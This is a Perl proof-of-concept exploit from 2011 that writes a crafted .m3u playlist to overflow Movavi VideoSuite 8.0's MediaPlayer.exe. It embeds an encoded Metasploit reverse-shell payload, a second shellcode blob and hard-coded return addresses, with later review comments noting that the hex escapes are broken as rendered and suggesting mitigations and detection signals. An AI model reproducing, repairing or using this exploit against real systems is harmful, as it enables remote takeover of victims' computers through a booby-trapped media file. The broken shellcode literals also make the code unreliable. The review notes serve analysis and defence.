
Movavi VideoSuite 8.0 MediaPlayer.exe Buffer Overflow

Posted on 08 March 2011

#!/usr/bin/perl
###
# Title : Movavi VideoSuite 8.0 (MediaPlayer.exe) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Access and BOF
# Tested on : Windows XP SP3 Français
# Target : Movavi Video Suite 8.0
###
# >>>>>> BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Note : This Exploit BOF is Special Greets to Member ' Overfolw3r ' From sec4ever.com
# ------------
# => start Movavi_VideoSuite_8.0 >> MediaPlayer.exe >> < Open TheEvil m3u File Here
# or .....etcMovavi Video Suite 8MediaPlayer.exe << Open The Evil m3u File Here
# ------------
#
# NOTE(review): the script is a proof-of-concept generator: it builds one long
# string in memory and writes it to a playlist file (Bo0M.m3u, see the open()
# near the end) that the target player is expected to parse. Nothing here
# touches the network; the "Remote Access" impact above refers only to what
# the embedded payload is described as doing once the crash is reached.
#
# NOTE(review): there is no `use strict` / `use warnings`. $junk, $ksh, $edh,
# $nh, $seh, $prp, $jmp, $alg, $psh, $ed and $kedans are undeclared package
# globals; only $payload, $eip, $usmh and $ret are lexicals.
#
#START SYSTEM /root@MSdos/ :
# The three system() calls below are cmd.exe built-ins (window title, console
# colour, clear screen). Their return values are not checked, so on any other
# shell they fail silently and the script carries on.
system("title KedAns-Dz");
system("color 1e");
system("cls");
print " ";
print " |===========================================================| ";
print " |= [!] Name : Movavi_VideoSuite_8 (MediaPlayer.exe) =| ";
print " |= [!] Exploit : Stack Buffer Overflow =| ";
print " |= [!] Author : KedAns-Dz =| ";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| ";
print " |===========================================================| ";
sleep(2);
print " ";
print " [!] Please Wait Loading... ";
# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
#
# NOTE(review): as this listing is rendered, every hex escape has lost its
# backslash ("x56" rather than an escape sequence), so the string literals
# below are plain ASCII text and do not encode the byte values the comments
# around them describe. The same applies to every quoted string in the file.
# Treat the listing as analysis material; the sizes quoted in comments
# (739 bytes, "x 50") do not match what these literals actually produce.
#
# The generator parameters above (LHOST 127.0.0.1, LPORT 4444) are the
# Metasploit defaults, i.e. a loopback callback; they are part of the encoded
# blob and would have to be regenerated to point anywhere else.
my $payload =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" .
"x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" .
"x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" .
"x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" .
"x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" .
"x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" .
"x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" .
"x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" .
"x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" .
"x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" .
"x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" .
"x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" .
"x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" .
"x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" .
"x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" .
"x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" .
"x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" .
"x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" .
"x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" .
"x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" .
"x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" .
"x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" .
"x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" .
"x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" .
"x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" .
"x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" .
"x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" .
"x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" .
"x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" .
"x50x43x30x47x71x43x58x43x32x45x50x44x51x43" .
"x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" .
"x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" .
"x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" .
"x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" .
"x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" .
"x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" .
"x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" .
"x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" .
"x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" .
"x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" .
"x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" .
"x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" .
"x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" .
"x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" .
"x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" .
"x7ax47x70x46x33x4bx4fx49x45x41x41"; #_ End Payload _
# Parameter OverFlow =>
#
# NOTE(review): both addresses below are fixed constants for the stated test
# box (Windows XP SP3, French locale) and the "MediaPlayerFR.dll" module,
# presumably the French-localised build. Fixed addresses only work against
# modules that are loaded at a known base and carry no SafeSEH table; from a
# mitigation standpoint, building the player with /DYNAMICBASE and /SAFESEH
# (ASLR + SafeSEH) removes exactly this class of hard-coded pivot.
#
# NOTE(review): $eip is computed but never included in $kedans below; its only
# use is to size $usmh (50 - length($eip)), so the kernel32 address comment
# is misleading about what actually ends up in the file.
my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll
my $usmh = "x90" x (50 - length($eip)); # Pack Length x 50
my $ret = pack('V',0x000c04e4); # Jump to ESP from MediaPlayerFR.dll
$junk = "x41" x 333 ; # Junk
$ksh = # <---- K.Sh --
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x37x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax47".
"x58x30x42x31x50x41x42x6bx42x41x57x42x32x42x41x32".
"x41x41x30x41x41x58x50x38x42x42x75x4dx39x49x6cx33".
"x5ax48x6bx42x6dx38x68x5ax59x6bx4fx49x6fx4bx4fx63".
"x50x6cx4bx30x6cx64x64x64x64x6cx4bx50x45x67x4cx4c".
"x4bx51x6cx37x75x61x68x76x61x58x6fx4ex6bx52x6fx72".
"x38x4cx4bx73x6fx45x70x43x31x68x6bx31x59x4cx4bx70".
"x34x4cx4bx57x71x7ax4ex34x71x4fx30x6ex79x6cx6cx6b".
"x34x6fx30x43x44x33x37x6bx71x69x5ax76x6dx53x31x49".
"x52x5ax4bx4cx34x45x6bx52x74x41x34x54x68x50x75x38".
"x65x6cx4bx63x6fx54x64x53x31x38x6bx43x56x4ex6bx36".
"x6cx72x6bx4ex6bx53x6fx75x4cx34x41x78x6bx64x43x64".
"x6cx6ex6bx4bx39x50x6cx41x34x65x4cx52x41x7ax63x64".
"x71x69x4bx51x74x6ex6bx71x53x66x50x4cx4bx77x30x74".
"x4cx6cx4bx74x30x45x4cx4cx6dx6ex6bx43x70x33x38x73".
"x6ex53x58x4cx4ex50x4ex64x4ex38x6cx46x30x6bx4fx4e".
"x36x65x36x61x43x63x56x33x58x36x53x34x72x71x78x44".
"x37x34x33x46x52x41x4fx42x74x6bx4fx48x50x65x38x5a".
"x6bx7ax4dx39x6cx45x6bx52x70x4bx4fx6ax76x71x4fx4e".
"x69x6dx35x50x66x6dx51x7ax4dx63x38x33x32x32x75x50".
"x6ax43x32x79x6fx38x50x45x38x68x59x73x39x4cx35x4e".
"x4dx56x37x6bx4fx6ax76x76x33x30x53x71x43x76x33x71".
"x43x41x53x76x33x73x73x71x43x6bx4fx4ex30x71x76x31".
"x78x37x61x41x4cx70x66x46x33x4bx39x48x61x6dx45x70".
"x68x39x34x57x6ax30x70x4bx77x72x77x6bx4fx78x56x31".
"x7ax46x70x61x41x63x65x6bx4fx4ex30x35x38x6cx64x6c".
"x6dx36x4ex6dx39x46x37x6bx4fx5ax76x42x73x71x45x59".
"x6fx68x50x75x38x6bx55x37x39x6cx46x67x39x46x37x69".
"x6fx4ax76x70x50x73x64x46x34x61x45x6bx4fx78x50x6d".
"x43x42x48x6bx57x54x39x6bx76x50x79x50x57x6bx4fx48".
"x56x70x55x49x6fx6ax70x45x36x41x7ax73x54x75x36x62".
"x48x65x33x30x6dx6ex69x7ax45x30x6ax52x70x63x69x75".
"x79x48x4cx4fx79x6dx37x71x7ax57x34x6ex69x58x62x67".
"x41x6bx70x69x63x6ex4ax4bx4ex77x32x66x4dx6bx4ex41".
"x52x66x4cx5ax33x6cx4dx51x6ax66x58x6ex4bx4cx6bx4e".
"x4bx42x48x70x72x69x6ex78x33x67x66x6bx4fx70x75x67".
"x34x4bx4fx4ex36x33x6bx70x57x56x32x50x51x46x31x46".
"x31x41x7ax54x41x30x51x41x41x66x35x30x51x69x6fx4e".
"x30x50x68x6cx6dx5ax79x77x75x4ax6ex52x73x39x6fx58".
"x56x30x6ax4bx4fx6bx4fx50x37x59x6fx6ex30x6cx4bx36".
"x37x79x6cx6dx53x78x44x31x74x4bx4fx6bx66x30x52x69".
"x6fx6ex30x65x38x6ax50x6ex6ax76x64x73x6fx63x63x49".
"x6fx4bx66x69x6fx4ex30x47"; # ///
# ----/>
# $edh is a purely alphanumeric blob (no escapes, so it survived rendering
# intact, unlike the strings above). Its role is not documented anywhere in
# the file; do not assume a meaning for it beyond "fixed filler placed
# between $alg and $psh" without confirming against the original source.
$edh ="PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI".
"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO".
"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA";
# /
# < | ! | ---
$nh = "x61". "x6e";
$seh = "x7bx41" ; # Open SEH
$prp = "x6e". "x05x14x11". "x6e". "x2dx13x11". "x6e";
$jmp = "x50". "x6e". "xc3";
$alg = "D" x 112;
$psh = "D" x 500;
$ed = "w00tw00t";
# --- | ! | >
# immiXing Parameters >>>
#
# File layout, in the order the concatenation below fixes it:
#   $junk (333 x "x41") | $nh | $seh | $prp | $jmp | $alg (112 x "D") | $edh
#   | $psh (500 x "D") | $ed ("w00tw00t") | $ksh | $usmh | $ret | $payload
# The result is a single line with no playlist entries at all, dominated by
# long runs of one repeated character. For content inspection of .m3u files
# that shape (no path/URL lines, a single very long line, long single-byte
# runs) is a cheap and reliable anomaly signal; "w00tw00t" is a handy
# literal marker for this specific sample.
$kedans = $junk.$nh.$seh.$prp.$jmp.$alg.$edh.$psh.$ed.$ksh.$usmh.$ret.$payload ; # Evil KedAns
# >> Creating ...
#
# NOTE(review): bareword filehandle, 2-argument open, and no success check.
# If the open fails, the next line prints to an unopened handle and the script
# still reports success: the `or die` on the line after is attached to the
# console print (which returns true), so that branch can never be reached.
# Output is written relative to the current working directory.
open (FILE ,"> Bo0M.m3u");
print FILE $kedans ;
print " File successfully created! " or die print " OpsS! File is Not Created !! ";
close (FILE);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================
